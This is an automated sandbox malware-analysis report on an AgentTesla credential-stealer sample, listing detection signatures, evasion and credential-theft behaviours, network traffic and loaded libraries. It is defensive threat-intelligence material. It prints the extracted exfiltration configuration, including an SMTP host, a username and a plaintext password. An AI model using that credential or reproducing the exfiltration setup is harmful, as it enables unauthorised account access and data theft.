Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
Analysis ID:1414887
MD5:7806be4f71ce1b0fc27c40974ecb5041
SHA1:bb38809901742d73eccbce01f4576aa6301d35fb
SHA256:81ace4c307c53dcb5aa5e1d7a971d373a734c747408be3a9158bb00b5b11f8a2
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2877478732.000000000311E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000002.2875221020.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.2875221020.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.2877478732.00000000030D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.2877478732.00000000030D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x316c3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x31735:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x317bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x31851:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x318bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3192d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x319c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x31a53:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                2.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  2.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 12 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 50.87.139.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, Initiated: true, ProcessId: 7208, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}
                    Multi AV Scanner detection for submitted file
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeReversingLabs: Detection: 28%
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeVirustotal: Detection: 30%Perma Link
                    Machine Learning detection for sample
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeJoe Sandbox ML: detected
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: DHOe.pdbSHA256@`g source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                    Source: Binary string: DHOe.pdb source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 50.87.139.143:587
                    Source: Joe Sandbox ViewIP Address: 50.87.139.143 50.87.139.143
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 50.87.139.143:587
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownDNS traffic detected: queries for: mail.elec-qatar.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000002.00000002.2877478732.0000000003126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.elec-qatar.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeString found in binary or memory: http://tempuri.org/Locations.xsdkServer=ARCHIT;Database=Sample;Trusted_Connection=TrueUPlease
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1640952261.0000000005BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1638793445.0000000003C7E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000002.00000002.2875221020.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, NmHr1WHWKO.cs.Net Code: IiB
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.raw.unpack, NmHr1WHWKO.cs.Net Code: IiB

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeCode function: 0_2_0288DFCC0_2_0288DFCC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeCode function: 0_2_029006400_2_02900640
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeCode function: 0_2_029032500_2_02903250
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeCode function: 0_2_029006300_2_02900630
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeCode function: 0_2_04F96C100_2_04F96C10
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeCode function: 0_2_04F900400_2_04F90040
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeCode function: 0_2_04F9001C0_2_04F9001C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeCode function: 2_2_01669B302_2_01669B30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeCode function: 2_2_01664A982_2_01664A98
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeCode function: 2_2_0166CDA82_2_0166CDA8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeCode function: 2_2_01663E802_2_01663E80
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeCode function: 2_2_016641C82_2_016641C8
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1638793445.0000000003C7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecf3ed1c-5c3b-4038-87a8-401c6c5075d4.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1638793445.0000000003C7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1638338911.0000000002B02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecf3ed1c-5c3b-4038-87a8-401c6c5075d4.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1637412343.0000000000E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641969184.00000000074D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000002.00000002.2875221020.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecf3ed1c-5c3b-4038-87a8-401c6c5075d4.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000002.00000002.2875379359.0000000000FC8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeBinary or memory string: OriginalFilenameDHOe.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, ISZbPXDvPz.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, ISZbPXDvPz.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, YpS.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, YpS.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, HKq2vk3JKxqu31jYBK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, HKq2vk3JKxqu31jYBK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, TmEnIZLOqWm4t2waYK.csSecurity API names: _0020.SetAccessControl
